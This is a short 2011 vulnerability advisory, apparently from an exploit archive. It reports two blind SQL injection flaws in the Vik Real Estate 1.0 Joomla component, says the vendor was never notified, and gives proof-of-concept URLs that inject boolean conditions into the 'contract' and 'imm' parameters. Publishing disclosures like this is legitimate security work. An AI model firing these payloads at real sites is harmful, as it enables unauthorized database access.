53 lines
No EOL
1.8 KiB
Text
Executable file
53 lines
No EOL
1.8 KiB
Text
Executable file
###################################################################
|
|
Vik Real Estate 1.0 Component Joomla Multiple Blind Sql Injection
|
|
###################################################################
|
|
|
|
Release Date Bug. 27-Oct-2011
|
|
Date Added. 30-Sep-2011
|
|
Vendor Notification Date. Never
|
|
Product. Vik Real Estate
|
|
Platform. Joomla
|
|
Affected versions. 1.0
|
|
Type. Commercial
|
|
Price. ?69.00
|
|
Attack Vector. Blind Sql Injection
|
|
Solution Status. unpublished
|
|
CVE reference. Not yet assigned
|
|
Download http://www.extensionsforjoomla.com/vik-real-estate/joomla-extensions/vik-real-estate?vmcchk=1
|
|
|
|
I. BACKGROUND
|
|
|
|
Extension to manage real estates with details and description.
|
|
Main Functions:
|
|
- Manage Types of Contract (rental, selling, etc.)
|
|
- Condition of use (commercial, residential, etc.)
|
|
- Types of houses (apartment, villa, etc.)
|
|
- Manage Features (garden, garage, pool, etc. with icons)
|
|
- Manage States/Cities and Areas (New York City, Soho. Florence, Airport etc.)
|
|
Add real estates with description and images.
|
|
Search module included.
|
|
|
|
II. DESCRIPTION
|
|
|
|
Two vulnerabilities have been discovered in Vik Real Estate, joomla component,
|
|
the 2 vulnerabilities are blind injections (boolean-based time-based blind & blind)
|
|
|
|
The parameters affected are:
|
|
contract
|
|
imm
|
|
|
|
III. EXPLOITATION
|
|
|
|
|
|
parameter [contract]:
|
|
|
|
//index.php?option=com_vikrealestate&act=results&contract=1' AND 1=1 AND '666'='666&adibit=1&prov=1&area=_any&pricemin=_any&pricemax=_any&mqmin=0&mqmax=_any&type=_any&gores=Search
|
|
|
|
parameter [imm]:
|
|
|
|
//index.php?option=com_vikrealestate&act=show&imm=3' AND 1=1 AND '666'='666
|
|
|
|
|
|
|
|
Discovered by.
|
|
Chris Russell |